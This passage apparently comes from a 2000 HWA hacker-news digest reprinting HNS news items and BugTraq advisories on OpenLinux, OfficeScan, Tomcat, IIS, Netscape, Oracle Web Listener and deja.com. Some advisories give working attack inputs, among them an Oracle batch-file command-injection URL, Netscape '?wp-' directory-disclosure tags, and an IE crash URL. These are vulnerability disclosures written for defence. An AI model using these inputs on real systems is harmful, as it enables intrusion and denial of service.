ordered held on $100,000 bail during the hearing in San Jose. On March 15, he was indicted on 15 criminal counts, including unauthorized access of a computer, recklessly causing damage and interception of electronic communication. All the counts carry sentences of at least six months and fines of hundreds of thousands of dollars. Butler, who also goes by the name of Max Vision, had been an FBI source, helping agents solve computer crimes, authorities said. He turned himself in on Tuesday. Butler's attorney did not return a telephone call seeking comment. @HWA 83.0 HNS:Mar 23rd:CALDERA SYSTEMS SECURITY ADVISORY ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by LogError Thursday 23 March 2000 on 12:19 PM The OpenLinux package contains a CGI script called rpm_query that allows a user to obtain a list of all RPM packages installed on that machine, provided the Apache Web server is running. This could be used by an intruder to determine what part of the system to attack. Link: Linux Today http://linuxtoday.com/stories/18850.html Caldera Systems Security Advisory: rpm_query allows everyone to list installed rpms Mar 22, 2000, 23:23 UTC (0 Talkbacks) Caldera Systems, Inc. Security Advisory Subject: rpm_query allows everyone to list installed rpms Advisory number: CSSA-2000-007.1 Issue date: 2000 March, 8 Last change: 2000 March, 14 Cross reference: 1. Problem Description The OpenLinux package contains a CGI script called rpm_query that allows a user to obtain a list of all RPM packages installed on that machine, provided the Apache Web server is running. This could be used by an intruder to determine what part of the system to attack. 2. Vulnerable Versions System Package ----------------------------------------------------------- OpenLinux Desktop 2.3 All packages previous to OpenLinux-2.3-17 OpenLinux eServer 2.3 All packages previous to OpenLinux-2.3-24S 3. Solution Workaround: Remove the script by executing: rm -f /home/httpd/cgi-bin/rpm_query The proper solution is to upgrade to the latest packages 4. OpenLinux Desktop 2.3 4.1 Location of Fixed Packages The upgrade packages can be found on Caldera's FTP site at: ftp://ftp.calderasystems.com/pub/openlinux/updates/2.3/current/RPMS @HWA 84.0 HNS:Mar 23rd:REMOTE SECURITY MANAGEMENT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by LogError Thursday 23 March 2000 on 12:14 PM Businesses can have their network security hosted and managed remotely using a new service from Network Associates. The company's myCIO.com service offers an ASP 'infrastructure' which allows partners such as ISPs, telecoms providers and even computer resellers to host NAI's products and services online. Link: VNUNET http://www.vnunet.com/News/601120 @HWA 85.0 HNS:Mar 23rd:"ANTI-ARAB" BUG ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 23 March 2000 on 3:29 AM The head of Microsoft's European and Middle East operations said on Wednesday the firm was fixing a bug in its Windows 2000 French-language spell-checker which suggested replacing "anti-stress" with the word "anti-arab." Link: Wired http://www.wired.com/news/politics/0,1283,35117,00.html MS Fixing 'Anti-Arab' Bug Reuters 7:00 a.m. Mar. 22, 2000 PST PARIS -- The head of Microsoft's European and Middle East operations said on Wednesday the firm was fixing a bug in its Windows 2000 French-language spell-checker which suggested replacing "anti-stress" with the word "anti-arab." Michel Lacombe, president of Microsoft EMEA, said the problem should be fixed in "a few weeks" and that customers would be offered a new version free of charge. "Microsoft is very sorry about this. We are always sensitive to things which confuse people and we are very respectful of people getting hurt," Lacombe told Reuters. "Microsoft has no problem with the Arab world, we invest in the Arab language, and in Arab countries. Our software developers are looking at a way to fix this and in a few weeks this will be behind us," he added. France's national CFDT trade union denounced Microsoft for its "racist turn of phrase." "As it is not able itself to go directly to court, the CFDT is informing national anti-racism societies. It will support any criminal action they should take," the CFDT said in a statement. Lacombe noted that the bug was in its spell-checker, not its thesaurus. "That would be worse. We are not trying to give a synonym of anti-stress, just to help the user solve a spelling problem," he said. @HWA 86.0 HNS:Mar 23rd:OFFICE 2000 PATCHES ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 23 March 2000 on 3:28 AM Microsoft posted Service Release 1 (SR-1) to the Web for download. It is the first collection of patches and fixes for Office 2000 since the product began shipping last June. Link: Microsoft http://officeupdate.microsoft.com/default.asp @HWA 87.0 HNS:Mar 23rd:SHARING INFORMATION ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 23 March 2000 on 3:16 AM A new bill aimed at encouraging companies to share information about hacker attacks would provide firms with a limited exemption from the Freedom of Information Act. Link: NewsBytes http://www.newsbytes.com/pubNews/00/146086.html Bill Would Protect Firms That Share Hacking Info By David McGuire, Newsbytes WASHINGTON, DC, U.S.A., 21 Mar 2000, 6:00 AM CST A new bill aimed at encouraging companies to share information about hacker attacks would provide firms with a limited exemption from the Freedom of Information Act (FOIA). Set to be introduced by Reps. Tom Davis, R-Va. and Jim Moran, D-Va., later this week, the legislation would allow companies to share information about cyberattacks with law enforcers and industry groups, without worrying that such information could come back to haunt them, Davis staffer David Marin said today. "The public interest will be served by companies coming forth to share their information" about attacks, Marin said. Too often now companies do not report cyberattacks for fear that such reports will find their way into the media, he said. While the bill would create a limited shelter under FOIA, it is not intended to allow companies to mask their business dealings, Marin said. When the legislation is completed it will be "narrowly tailored to address (information pertaining to) how the attack was done and what was done to fix the attack," Marin said. The legislation will apply only to telecommunications and information technology infrastructure attacks. Used primarily by the media, FOIA allows members of the press and the public to file legally binding requests for public documents. FOIA already contains an exemption for ongoing criminal investigations, by Davis and Moran are aiming to further protect firms that divulge information about cyberattacks, Marin said. Reported by Newsbytes.com, http://www.newsbytes.com . @HWA 88.0 HNS:Mar 23rd:MONITORING WITH GOOD RESULTS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 23 March 2000 on 2:31 AM A federal appeals court has upheld a CIA policy allowing agency officials to monitor employees' Internet use. The policy had helped convict a federal employee of downloading child pornography on government time. Link: GovExec article http://www.govexec.com/dailyfed/0300/032000m1.htm Link: US vs. Simons - court's decision http://www.law.emory.edu/4circuit/feb2000/994238.p.html GovExec; March 20, 2000 DAILY BRIEFING Court upholds agency reviews of employees' Internet use By Kellie Lunney klunney@govexec.com A federal appeals court has upheld a CIA policy allowing agency officials to monitor employees' Internet use. The policy had helped convict a federal employee of downloading child pornography on government time. The CIA's Foreign Broadcast Information Service implemented a policy in June 1998 authorizing "electronic audits" of employee computers in order to crack down on non-business related Internet use. Those audits included reviewing employees' e-mail messages and collecting information on their Web site visits. Later that summer, Science Applications International Corp. (SAIC), which had a contract to manage FBIS' computer network and monitor inappropriate Internet behavior, alerted the agency when the keyword "sex" turned up numerous hits in a firewall database during a routine test. The hits originated from the computer of Mark L. Simons, an electronic engineer at FBIS. FBIS officials then searched Simons' computer and office on four occasions, eventually compiling enough evidence to indict him on two counts of knowingly receiving and possessing child pornography downloaded from the Internet and stored on his government hard drive. Simons claimed that his Fourth Amendment rights had been violated during the searches. But a district court upheld the searches. Simons was found guilty and was sentenced to 18 months in jail. The U.S. Court of Appeals for the Fourth Circuit affirmed that decision in late February, saying that Simons failed to prove that he had a "legitimate expectation of privacy in the place searched or the item seized." According to the appeals court, "In the final analysis, this case involves an employee's supervisor entering the employee's government office and retrieving a piece of government equipment in which the employee had absolutely no expectation of privacy [due to the agency's Internet policy]—equipment that the employer knew contained evidence of crimes committed by the employee in the employee's office ... Here, there was a conjunction of the conduct that violated the employer's policy and the conduct that violated the criminal law." The court's decision in USA v. Simons (99-4238) is online at www.law.emory.edu/4circuit/feb2000/994238.p.html. @HWA 89.0 HNS:Mar 23rd:CRIME FIGHTING LAB ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 23 March 2000 on 2:15 AM With an eye toward cracking down on cyber crime, officials at the College of DuPage on Monday unveiled a new state-of-the-art computer lab at the college's Suburban Law Enforcement Academy. Link: Chicago Tribune http://www.chicagotribune.com/news/metro/dupage/printedition/article/0,2669,SAV-0003210202,FF.html FIGHTING CRIME ON COMPUTER LAB GIFTS LET COLLEGE OFFER CLASS FULL-TIME By LeAnn Spencer Tribune Staff Writer March 21, 2000 With an eye toward cracking down on cyber crime, officials at the College of DuPage on Monday unveiled a new state-of-the-art computer lab at the college's Suburban Law Enforcement Academy. There, officers will learn how to track computer criminals, from pedophiles who prey on children to shysters out to bilk people of money to hackers who infiltrate confidential Web sites. The lab at the Glen Ellyn school also will train officers in how to conduct on-line investigations, in computer modeling that will enable them to reconstruct a crime scene, and in how to present the evidence in court. The new lab was made possible by a donation from Microsoft Corp. and Omni Tech Corp. of 51 new personal computers, screens and keyboards; a printer and overhead projector; all the necessary software; and technical support services. The equipment and software are valued at $250,000, college officials said, and enable the college to create one of the nation's few specialized computer crime labs dedicated to training law enforcement personnel. No civilians will be able to enroll in the 40-hour, weeklong classes, which will cost $475 in tuition. "The industry is very motivated in learning how to tackle the problems" of computer crime, Bob Herbold, executive vice president and chief operating officer of Microsoft, said at a Monday unveiling of the lab. Until now, the law-enforcement academy has held its computer crime classes by borrowing computer space elsewhere on campus, and only when regular classes were out of session. The new computer lab allows the academy to offer classes virtually year-round, reaching literally hundreds of officers and prosecutors. Already, the academy is receiving attention from police departments all over the country, as well as Canada, officials said. College officials said that there is a real need for the training as police and prosecutors struggle to keep pace with the sometimes confusing world of computer crime. "When this was brand-new technology, it was difficult for police departments to follow up," said Mike Sullivan, Naperville police detective and an instructor at the law enforcement academy. But understanding the inner workings of computers and the Internet, officials said, is no different than learning any kind of new technology, whether it be fingerprinting or the use of DNA evidence. One unusual aspect of the lab will be that the police officers in the class will be able to pose as children and log on to pornographic Web sites or chat rooms where Internet users prey on the young. As pedophiles reveal themselves, they can be investigated and arrested, officials said. "It used to be that pedophiles would go to the park and pick their victims," Sullivan said. "As the Internet came along, the Internet has become the virtual park." Such real-life training is invaluable. "There's no place else that you can go in and see a felony being committed while you are doing police training," Sullivan said. Sullivan noted that many people wrongly think what they do on the Internet cannot be traced. "When a crime is committed on the Internet, it makes it easier for us to track you. It's like committing a crime and then leaving your license plate at the scene," he said. "You can't go on the Internet," he said, "without leaving a footprint." @HWA 90.0 HNS:Mar 23rd:HUNTING CROATIAN PIRATES ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 23 March 2000 on 1:49 AM Three days ago, first coordinated police action against software pirates in Croatia resulted with confiscation of more than 47 computers, 8536 CD's, 2602 floppy disks and nearly $1 million worth of software. Link: Bug On-line (Croatian language) http://www.bug.hr/vijesti/index.asp?datum=22032000#id3268 @HWA 91.0 HNS:Patch available for OfficeScan vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 24, 2000 Trend Micro has released a patch that eliminates server security vulnerabilities found on OfficeScan Corporate Edition 3.51 or earlier versions, running on Windows NT 4 server with Internet Information Server(IIS). ... Patch available for OfficeScan vulnerability Posted to BugTraq on March 24, 2000 Security Focus BugTraq ID: 1057 Posted: March 22, 2000 Summary ======= Trend Micro has released a patch that eliminates server security vulnerabilities found on OfficeScan Corporate Edition 3.51 or earlier versions, running on Windows NT 4 server with Internet Information Server (IIS). These versions of OfficeScan allow intruders within a firewall to invoke OfficeScan CGIs on the server without authentication - bypassing OfficeScan management console password protection. These OfficeScan CGIs are intended for administrator to manage OfficeScan antivirus running on networked workstations via the OfficeScan management console. By gaining access to execute these CGIs, hackers can use them to change OfficeScan antivirus configurations or to uninstall OfficeScan antivirus on thedesktops. Issues ====== Trend OfficeScan version 3.51 or earlier versions apply inadequate security settings on the OfficeScan server CGI components. If a malicious user, has the ability to connect to the OfficeScan server via a web browser, these CGIs can be executed to send valid commands - including uninstall command - to OfficeScan clients. In addition, OfficeScan's implementation of user authentication in its management console - password protection - was insufficiently encrypted, and allows a malicious user to decrypt and gain access to the OfficeScan management console. Implementation ============== Trend Micro has released a patch that will secure access to the OfficeScan CGIs on the server. The patch program changes the file permissions on the OfficeScan CGIs, so only administrators can access and execute them. This patch works only on drives formatted to use Windows NT file system (NTFS). After applying this patch, hackers will no longer be able to remotely invoke OfficeScan CGIs without being authenticated as a administrator by NTFS security. This patch also prevents hackers, who sniffs for OfficeScan management console password over the network, from gaining access to the OfficeScan management console. Access to the OfficeScan management console or to execute OfficeScan CGIs now requires NTFS authentication. Affected Software Versions ========================== Trend OfficeScan Corporate Edition 3.0 Trend OfficeScan Corporate Edition 3.11 Trend OfficeScan Corporate Edition 3.13 Trend OfficeScan Corporate Edition 3.50 Trend OfficeScan Corporate Edition 3.51 Trend OfficeScan for Microsoft SBS 4.5 This vulnerability is only present when the above software version is installed on a Windows NT server with IIS. It is not present when the above software version is installed on Novell NetWare servers or Windows NT server without IIS. Patch Availability ================== OfficeScan Unauthenticated CGI Usage patch can be downloaded from: http://www.antivirus.com/download/ofce_patch.htm More Information ================ Please see the following references for more information related to this issue. - Trend Micro Security Bulletin: http://www.antivirus.com/download/ofce_patch_351.htm - Frequently Asked Questions: Trend Micro Knowledge Base http://solutionbank.antivirus.com/solutions/faqResult.asp?product=8 Obtaining Support on this Issue =============================== This is a fully supported patch. Information on contacting Trend MicroTechnical Support is available at http://www.trend.com/support/default.htm Acknowledgements ================ Trend Micro thanks Gregory Duchemin http://www.securite-internet.com and Elias Levy http://www.securityfocus.com for reporting the OfficeScan server vulnerability to us, and working with us to protect our customers @HWA 92.0 HNS:Gpm-root problems ~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 23, 2000 When the user selects one of his/her favourite utility from his/her own list, gpm-root starts this process with the group and supplementary groups of the gpm-root daemon ... Gpm-root problems Posted to BugTraq on March 23, 2000 I've sent report about the following security hole to the authors of gpm, but they seemed to ignore the problem. The problem applies to every gpm version known by me, for example 1.18.1 and 1.19.0. To exploit this problem, gpm-root must be running on a machine and the user needs both login to that machine and physical access to the keyboard and mouse. gpm-root is a beautiful tool shipped in the gpm package. It pops up beautiful menus based on each user's own config file when Ctrl+Mousebutton is pressed on the console. When the user selects one of his/her favourite utility from his/her own list, gpm-root starts this process with the group and supplementary groups of the gpm-root daemon. gpm-root calls setuid() first and setgid() afterwards, hence the later one is unsuccessful. The authors completely forgot about calling initgroups(). Egmont Koblinger @HWA 93.0 HNS:Esafe Protect Gateway (CVP) problems ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 22, 2000 The Esafe Protect Gateway (ESPG) does not scan some files in combination with FireWall-1 and CVP ... Esafe Protect Gateway (CVP) problems Posted to BugTraq on March 22, 2000 After notification of the manufacturer here is the full report on aproblem noted with Esafe Protect Gateway. SUMMARY ------- The Esafe Protect Gateway (ESPG) does not scan some files in combination with FireWall-1 and CVP. DETAILS ------- If you want the Esafe Protect Gateway to scan all content for the presence of a virus you have two options. 1. Choose to scan anything not listed in the 'safe file types' list. And then clear out all entries in that list. 2. Choose to scan only files listed in the 'dangerous file types' list. And then have only one extension listed namely '*'. Deciding to rely on extensions seems an indication of a flawed designallready. Renaming files is a common practice and can be done by anyone capable of operating a keyboard. The problem is that anything with the MIME type set to TEXT/HTML will not be scanned regardless of the options recommended above. A simple test was capable of pointing this out. Setup a default Apache server. Copy a virusfile to two location beinghttp://website/test1.txt and http://website/test1.html and try to download them with your favorite browser. The URL is unique and was never used by your browser to minimize the possibilities of caches being in place. But forced reloads work properly and are sufficiant if you want to replicate this issue. Downloading http://website/test1.html dows nothing to detect the virus and it is yours. No protection is offered. Downloadinghttp://website/test1.txt will not work as ESPG will now intercept the file contain the virus. By adjusting the webserver to send out *.txt as MIME type TEXT/HTML and *.html as MIME type TEXT/PLAIN you can now test with http://website/test2.txt and http://website/test2.html to verify things. Downloading http://website/test2.txt will get you infected as ESPG will not scan the file. And downloading http://website/test2.html will not work as ESPG detects the virus and will prevent it from downloading. CONCLUSION ---------- Esafe Protect Gateway can at present not be trusted to protect you from downloading a virus. VERSIONS -------- Esafe Protect Gateway v2.1 build 98. Virus tables dated March 15, 2000. STATUS ------ Manufacturer notified. No fix available. Results have not been confirmed yet. However I was able to verify that the problem lies with Esafe and not with Check Point by using Trend Micro's CVP server instead which did not suffer from the same problem. Hugo. @HWA 94.0 HNS:Bug in Apache project: Jakarta Tomcat ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 22, 2000 The Apache project: Jakarta Tomcat contains a serius security bug. Tomcat is used together with the Apache web server to serve Java Server Pages and Java servlets. ... Bug in Apache project: Jakarta Tomcat Posted to BugTraq on March 22, 2000 The Apache project: Jakarta Tomcat contains a serius security bug.Tomcat is used together with the Apache web server to serve Java Server Pages and Java servlets. Summary from the Tomcat development team advisory is posted below:Advisory: Delivered with Tomcat is an example (jsp/source.jsp) that can be used to deliver the contents of any file on your machine. Recommended action: The simplest course of action is to simply remove this example from your machine. Alternatively, you can replace the associated ShowSource.class file with one from the current 3.1 beta. Fixes: Fixes have been made to the core of Tomcat to not allow any file references to be resolved outside of the context being used for the resolution.Additionally, a change has been made to ShowSource.java to disallow any requests which contain the string "..". The 3.1 beta 1 release has been refreshed with these fixes applied. Med venlig hilsen/Best regards/Freundliche Grüße Jan Madsen S e c u r i t y w o r k e r s @HWA 95.0 HNS:MS SECURITY BULLETIN #18 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 21, 2000 Microsoft has released a patch that eliminates a securityvulnerability in Microsoft Internet Information Server 4.0. The vulnerability could allow a malicious user to consume all resources on a web server and prevent it from servicing other users.< ... MS SECURITY BULLETIN #18 Posted to BugTraq on March 21, 2000 Microsoft Security Bulletin (MS00-018) - -------------------------------------- Patch Available for "Chunked Encoding Post" Vulnerability Originally Posted: March 20, 2000 Summary ======= Microsoft has released a patch that eliminates a securityvulnerability in Microsoft(r) Internet Information Server 4.0. Thevulnerability could allow a malicious user to consume all resources ona web server and prevent it from servicing other users. Frequently asked questions regarding this vulnerability can be foundat http://www.microsoft.com/technet/security/bulletin/fq00-018.asp. Issue ===== IIS 4.0 supports chunked encoding transfers, but does not limit thesize of the buffer that can be reserved. This would allow a malicioususer to request an extremely large buffer for a POST or PUT operation,but never actually send data, thereby blocking memory on the serverthat had been allocated to the session. If sufficient memory on theserver were blocked in this fashion, it could prevent the server fromperforming useful work. There is no capability through this attack tocreate, modify or delete data on the server, nor is there anycapability to usurp administrative control of the server. If themalicious user closed his session, the memory would be released andthe server's operation would return to normal. Otherwise, the machinecould be put back into normal service by stopping and restarting theservice. Affected Software Versions ========================== - Microsoft Internet Information Server 4.0 Patch Availability ================== - X86: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=19761 - Alpha: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=19762 NOTE: Additional security patches are available at the MicrosoftDownload Center @HWA 96.0 HNS:S.A.F.E.R. Security Bulletin 000317 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 20, 2000 Problem exists in Netscape Enterprise Server that can allow remote user to obtain list of directories and subdirectories on the server ... S.A.F.E.R. Security Bulletin 000317 Posted to BugTraq on March 20, 2000 S.A.F.E.R. Security Bulletin 000317.EXP.1.5 ______________________________________________ TITLE : Netscape Enterprise Server and '?wp' tags DATE : March 17, 2000 NATURE : Remote user can obtain list of directories on Netscape Enterprise Server AFFECTED : Netscape Enterprise Server 3.x PROBLEM: Problem exists in Netscape Enterprise Server that can allow remote user to obtain list of directories and subdirectories on the server. DETAILS: Netscape Enterprise Server with 'Web Publishing' enabled can be tricked into displaying the list of directories and subdirectories, if usersupplies certain 'tags'. For example: http://home.netscape.com/?wp-cs-dump will reveal the contents of the root directory on that web server.Contents of subdirectories can be obtained as well. Other tags that can be used are: ?wp-ver-info ?wp-html-rend ?wp-usr-prop ?wp-ver-diff ?wp-verify-link ?wp-start-ver ?wp-stop-ver ?wp-uncheckout FIXES: Disable 'Web Publishing'. It is safe to assume that 'Web Publishing' is not the only feature that will 'activate' this problem. We have foundfew servers running Netscape Enterprise Server that did not have 'WebPublishing' enabled, but were still vulnerable to this problem. UntilNetscape makes an official response and clarify what is the cause ofthis problem, it is advised that you test your server against thisvulnerability, and if you are vulnerable, try to disable certainfeatures and services. Netscape has been contacted on many occasions, but has failed torespond. S.A.F.E.R. - Security Alert For Entreprise Resources Copyright (c) 2000 The Relay Group @HWA 97.0 HNS:Decon fix for con/con is vulnerable ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 18, 2000 If you had con problem and installed Decon fix, you are now vulnerable to another win 95(possibly)/98(tested) crash which is worse than the previous. ... Decon fix for con/con is vulnerable Posted to BugTraq on March 18, 2000 If you had con problem and installed Decon fix, you are now vulnerableto another win 95(possibly)/98(tested) crash which is worse than the previous. Software affected : All versions of Microsoft Internet Explorer (Itdoesn't work in Netscape Navigator) Actual problem :Type existing server in address box, and then request for nonexistent file with name >300 symbols. After server sends reply to the browseryour system stops responding at all, Control+Alt+Del work but youwon't see the box with tasks running so only thing you can do isREBOOT. Somebody can deface some good website and create a redirectwith 0 seconds waiting to such link. Example : http://www.amsouth.com/(lot of aaaa's).html Fix : Delete Decon fix from startup folder :) Now you are vulnerableto con/con. Hello to Cre@tor Speedo mailto:Tima@au.ru @HWA 98.0 HNS:Cerberus Information Security Advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 17, 2000 The Cerberus Security Team has discovered a number of issues with Oracle's Web Listener, part of the Oracle Application Server, that can allow a remote attacker to run arbitrary commands on the web server ... Cerberus Information Security Advisory Posted to BugTraq on March 17, 2000 Released : 15th March 2000 Name : Oracle Affected Systems : Oracle Web Listener 4.0.x on Windows NT Issue : Attackers can run arbitrary commands on the webserver Description *********** The Cerberus Security Team has discovered a number of issues with Oracle's Web Listener, part of the Oracle Application Server, that can allow aremote attacker to run arbitrary commands on the web server Details ******* Part of the problem is caused by default settings after OAS has beeninstalled. The "ows-bin" virtual directory on an Oracle Web Listener is the equivalent of the "cgi-bin" on other web servers and by default this is set toC:\orant\ows\4.0\bin - this directory not only contains a number of batch files, DLLs andexecutables but also the binary image file for the Listener itself. Even if this default setting has been changed however you may still be at risk if you have batch files in the new "ows-bin" directory. Arbitrary Command Execution *************************** The Oracle Web Listener will execute batch files as CGI scripts and bymaking a request to a batch file that requires one or more arguments it is possible to execute any command the attacker wants by building a special query string. For example the following will give a directory listing: http://charon/ows-bin/perlidlc.bat?&dir It is even possible to use UNC paths so the Listener will connect to the remote machine over NBSession, download the executable and then execute it. By default the Web Listener process runs in security context of SYSTEM so anycommands issued by an attacker will run with SYSTEM privileges. Another problem is that the Listener will expand the "*" character so even if the attacker doesn't know the name of a real batch file in the "ows-bin"they can request *.bat?&command Executables *********** Some of the executables in the default directory allow attackers to kill services, return configuration information and cause other undesirable events tooccur. Solution: ********* Due to the severity of this problem Cerberus recommends that the following be actioned immediately. If "ows-bin" is the default then using the Oracle Application Server Manager remove the ows-bin virtual directory or point it to a more benign directory. If "ows-bin" is not the default then verfiy that there are no batch files in thisdirectory. A check for this has been added to Cerberus' security scanner, CIS available from their website. About Cerberus Information Security, Ltd ******************************** Cerberus Information Security, Ltd, a UK company, are specialists inpenetration testing and other security auditing services. They are thedevelopers of CIS (Cerberus' Internet security scanner) available for free from their website: http://www.cerberus-infosec.co.uk To ensure that the Cerberus Security Team remains one of the strongestsecurity audit teams available globally they continually research operating system and popular service software vulnerabilites leading to the discovery of "world first" issues. This not only keeps the team sharp but also helps the industry and vendors as a whole ultimately protecting the end consumer. As testimony to their ability and expertise one just has to look at exactly how many major vulnerabilities have been discovered by the Cerberus Security Team - over 40 to date, making them a clear leader of companies offering such security services. Founded in late 1999, by Mark and David Litchfield, Cerberus Information Security, Ltd are located in London, UK but serves customers across the World. For more information about Cerberus Information Security, Ltd please visit their website or call on +44(0) 181 661 7405 Permission is hereby granted to copy or redistribute this advisory but onlyin its entirety. Copyright (C) 2000 by Cerberus Information Security, Ltd @HWA 99.0 HNS:Malicious-HTML vulnerabilities at deja.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 17, 2000 Deja.com does not always escape meta-characters when displaying Usenet articles. This allows an attacker to include arbitrary tags in the HTML sentto people reading the attackers article at deja.com.< ... Malicious-HTML vulnerabilities at deja.com Posted to BugTraq on March 17, 2000 Niall Smart, niall@pobox.com Synopsis ======== deja.com does not always escape meta-characters when displayingUsenet articles. Specifically, the article view page(http://www.deja.com/getdoc.xp) and the thread view page(http://www.deja.com/viewthread.xp) display the subject of thearticle "as is" between title tags. This allows an attacker to include arbitrary tags in the HTML sentto people reading the attackers article at deja.com. There are probably a large number of sites out there with this typeof vulnerability, the deja.com example is interesting because it'sa busy site with a large amount of relatively users who naivelytrust it. Exploit ======= An attacker can embed any tag in the head or body of the HTML page.This allows numerous attacks including: Cross Site Scripting: An attacker can post an article with a link to a script on anotherserver and call that script from the onLoad event handler. Site Spoofing: An attacker can use a meta tag to automatically redirect theuser to a spoofed version of deja.com. See the CERT advisory referenced below for more information on thistype of attack. Examples ======== NOTE: The following examples are intended to be harmless, however I take no responsibility for any damage caused by following these links. JavaScript popup: http://www.deja.com/getdoc.xp?AN=591804116 Redirection using meta tag: http://www.deja.com/getdoc.xp?AN=591833344 Notes ===== I haven't thoroughly tested deja.com's pages, there may be otherinstances of this error. It would be particularly interesting tofind one that didn't require the attacker to include the HTML inthe subject field of the article. This example illustrates how *not* to approach meta-characterescaping. If you call a function to escape meta-characters eachtime the data is inserted into the web page, as deja.com appear todo, you run the risk of occasionally forgetting to do it. deja.comescape correctly in two other places on the article view page butforget once. Instead you should escape them earlier in the dataflow, perhaps just after getting the data from the database, therebyprecluding the human-error factor. References ========== CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests http://www.cert.org/advisories/CA-2000-02.html HTML 3.2 Character Entities http://www.w3.org/TR/REC-html32.html#latin1 @HWA 100.0 HNS:Certificate Validation Error in Netscape Browsers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 17, 2000 The problem is that there is an inherited trust between an expiredcertificate and an active certificate, where there really shouldn't be. If any trust should be there, it certainly shouldn't be with an expired certificate. ... Certificate Validation Error in Netscape Browsers Posted to BugTraq on March 17, 2000 This may not be a normal "BugTraq" issue, since it is more a flaw in trust in a security design then it is an actual bug in software...butnone-the-less I think it is something that should be discussed. I haven't checked this with Microsoft IE, I just noticed it as being a flaw inNetscape (submitted a bug report to them earlier but they are eitherreally busy or have chosen to ignore the report.) Tested in browsers from 4.07 - 4.72, all which operated in the same fashion. What is the issue? The scenario is that a user accesses a website for which they do notcurrently have trust for the signer of the certificate. They are asked whether they would like to trust the server certificate (until itexpires,) which if they respond yes, the web site signer certificate will be stored in the certificate database. You can check on thesecertificates by clicking on the Security Icon on the browser, then select the Website item from the menu. Once stored in the database, any future access to this site is permitted without warning. The error occurs when the web site certificate is expired and the new site certificate is valid, Netscape never checks to see if the certificate is expired and replaced with a new certificate, and thus the user can continue to access the site without a warning stating that the certificate is expired and that a new certificate exists for the site (it apparently only checks to see if the new certificate isn't expired.) Manually verifying the old certificate in the database will prove that the certificate is invalid. When the site is properly reissued a certificate, Netscape automatically trusts the newcertificate based on the previous certificate...if the previouscertificate is removed from the database and the website is re-accessed, the standard warning appears asking the user if they wish to trust thecertificate. Since the new certificate is cryptographically differentfrom the old certificate, no trust relationship should exist (only thesigner is the same.) Netscape does not replace the old expired certificate with the newcertificate, and does not add the new certificate to the database. Nor does it tell the user that the new certificate a site is sending does not match a previous certificate. Why is this a problem? The problem is that there is an inherited trust between an expiredcertificate and an active certificate, where there really shouldn't be. If any trust should be there, it certainly shouldn't be with an expired certificate. The idea here is that Netscape should complain about a site which has a certificate different than what Netscape has in its database. When you accept a certificate from a website which you do not already hold a trust with the signer of the certificate, you should be warned if that certificate is no longer valid or when the server has been issued a new one. You are trusting that certificate and its signer, not that site. If the site's certificate changes, you should be warned about the change and asked if you still want to trust the site. If a hacker manages to gain access to the key and the certificate, and changes the key and thecertificate, a warning may be the only thing to protect you from thathacker becoming a man in the middle to the attack. What should be the solution? An option, in the browser, to allow the user to be warned the first time a certificate changes on a webserver. If the previous certificate isexpired, and the current certificate on a site is different, the usershould be warned of the change, and asked whether they wish the newcertificate to replace the previous one. That way, paranoid users like myself can be warned when a certificate changes, so that we can decidewhether the new certificate should be trusted. Of course, if I already trust the certificate signer, then I shouldn't be prompted about thecertificate. @HWA 101.0 HNS:"OfficeScan DoS & Message Replay" Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 17, 2000 Trend Micro has released a new version of OfficeScan Corporate Edition - version 3.51 - that eliminates two security vulnerabilities found on previous versions ... OfficeScan DoS & Message Replay" Vulnerability Posted to BugTraq on March 17, 2000 Summary ======= Trend Micro has released a new version of OfficeScan Corporate Edition - version 3.51 - that eliminates two security vulnerabilities found onprevious versions. Previous versions of OfficeScan allow intruders within a firewall to initiate a DoS attack on the OfficeScan client (tmlisten.exe) as well as to capture OfficeScan commands. These commands can be replayed and used to change other OfficeScan client configurations. Issues ====== Trend OfficeScan version 3.5 or earlier versions perform incomplete parsing and buffer overflow checking in its Windows NT client. If a malicious user, has the ability to telnet and submit some form of message to the OfficeScan NT client, OfficeScan service consumes 100% CPU processing power. Inaddition, communication between the OfficeScan server and client wasestablished with insufficient encryption and authentication, which allows a malicious user to sniff and replay OfficeScan commands. Implementation ============== Trend Micro has corrected the DoS attack issue 